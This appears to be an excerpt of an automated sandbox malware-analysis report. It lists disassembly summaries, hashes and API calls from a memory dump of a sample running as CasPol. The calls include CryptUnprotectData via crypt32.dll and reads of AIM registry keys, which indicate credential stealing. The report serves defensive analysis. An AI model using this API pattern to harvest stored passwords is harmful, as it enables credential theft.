                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_42_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$DeleteIconLoadObject
                                                                                                                                                                                                                    • String ID: ;@
                                                                                                                                                                                                                    • API String ID: 1986663749-2925476404
                                                                                                                                                                                                                    • Opcode ID: 462c25ec0a62c83cd232211add7106b677ed3de08da03debaff4362743836162
                                                                                                                                                                                                                    • Instruction ID: 4d16bad446557b49ffcede9a37569aa771c04751a2fd478bf3dc9e82e5d405e4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 462c25ec0a62c83cd232211add7106b677ed3de08da03debaff4362743836162
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A921AE70900314CBCB50AF6698846D97BA8BB01714F9886BFEC0DAF286CF7855408F68
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(crypt32.dll), ref: 00404CAA
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptUnprotectData,?,?), ref: 00404CBC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_42_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                    • String ID: CryptUnprotectData$crypt32.dll
                                                                                                                                                                                                                    • API String ID: 145871493-1827663648
                                                                                                                                                                                                                    • Opcode ID: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                                                                                                                                                                                                    • Instruction ID: 7870739769311804760c3d1e0253e2144152d34b250ce61cbbba51fe108a7f01
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01E012B06057108AE7205F76A9057837AD4AB84744F12843EA149E2580D7B8E440C798
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00411CB8
                                                                                                                                                                                                                      • Part of subcall function 00406F2D: sprintf.MSVCRT ref: 00406F65
                                                                                                                                                                                                                      • Part of subcall function 00406F2D: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00406F78
                                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411CDC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00411CF4
                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,00417C88,?,00002000,?), ref: 00411D12
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_42_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3143880245-0
                                                                                                                                                                                                                    • Opcode ID: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                                                                                                                                                                                                    • Instruction ID: 17bc1180ef60d6c0bde436c598d7e35c316bda315ace93708f1b6f060f7ed051
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0611A771500219BFDF115F64EC8AEDB3F78EF04754F100066FA09A2151E6358964CBA8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 00412098
                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004120A9
                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004120B9
                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 004120C4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_42_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                                                    • Opcode ID: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                                                                                                                                                                                                    • Instruction ID: 6eee99af0fd3847aa000c15d4e464fa532876ff6069f3449b7718533803959f6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0101C432600215AB8B158F95DD489DB7F6AFF8A391305C036ED09C6360D770C890C6CC
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D959
                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040D969
                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040D989
                                                                                                                                                                                                                      • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                                      • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(00000008), ref: 0040D925
                                                                                                                                                                                                                      • Part of subcall function 0040D794: RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
                                                                                                                                                                                                                      • Part of subcall function 0040D794: atoi.MSVCRT(?), ref: 0040D840
                                                                                                                                                                                                                      • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D869
                                                                                                                                                                                                                      • Part of subcall function 0040D794: _mbscpy.MSVCRT(?,?), ref: 0040D8B3
                                                                                                                                                                                                                      • Part of subcall function 0040D794: _mbscpy.MSVCRT(?,?,?,?), ref: 0040D8C6
                                                                                                                                                                                                                      • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(?), ref: 0040D8FC
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_42_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Close_mbscpy$DirectoryInformationQueryValueVolumeWindowsatoi
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2578913611-0
                                                                                                                                                                                                                    • Opcode ID: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                                                                                                                                                                                                    • Instruction ID: 16f147aac1a6c23bf629e3733d081773eeb3eb261c5fc0fbd4ac26dcbb8d373b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB01ECB2C0011CFFDB11DAD4DD85EDEBBACAB08348F1444BAB609E2051D6744F989BA4
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?,004066D9), ref: 00410D78
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?), ref: 00410D80
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_42_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentDirectoryFreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2760881011-0
                                                                                                                                                                                                                    • Opcode ID: cded8f3f9ffc36de7afb34d45e755dd8b67c7cc5ec9fbb08d081a71ea3e3bd5e
                                                                                                                                                                                                                    • Instruction ID: c686a64e774c0d910729c20308bd6d7dac36cbeeda648e68b024901bbde96cda
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cded8f3f9ffc36de7afb34d45e755dd8b67c7cc5ec9fbb08d081a71ea3e3bd5e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DC00239000A01DFD7219FA0E808BE5BBF4BF48342FA8496DE1C581064E7799594CF48
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_42_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    • Opcode ID: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                                                                                                                                                                                                    • Instruction ID: e399220ee4d6b13c72a3c0d8b1802730825471fdce5c5047c746ffbeb5b4c0d0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95C09B71111701CBF7214F50C948793B7F4BF40717F50485C95D5D5080D77CD554DA18
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,?,Function_0001208B,00000000), ref: 00412120
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_42_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                                                                                    • Opcode ID: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                                                                                                                                                                                                    • Instruction ID: 035a6a4498e4538559194e0194001357af3b3daa9477d160ae033d236808df75
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1C09B31594741D7D7119F608D05F5B7E95BB9C701F114D397355D40A4D7514024D605
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_42_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                                                    • Opcode ID: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                                                                                                                                                                                                    • Instruction ID: 0badf10416d1e61bd1c3ad237588f2502b9813823e024cd162efce7da5e32b0f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5C09270A109019BE22C5F38EC5986E77E1AF8A3343B45F6CA0F3E20F0E73895428A04
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_42_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                                                    • Opcode ID: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                                                                                                                                                                                                    • Instruction ID: ce7f413466e1863fe1078dd7deec7b9c9a94e59086d3684c19d06f0563d6b072
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CC09235548301FFDE128F80EE0AF4ABFA2BBC8B05F508818B284240B1C2728824EB57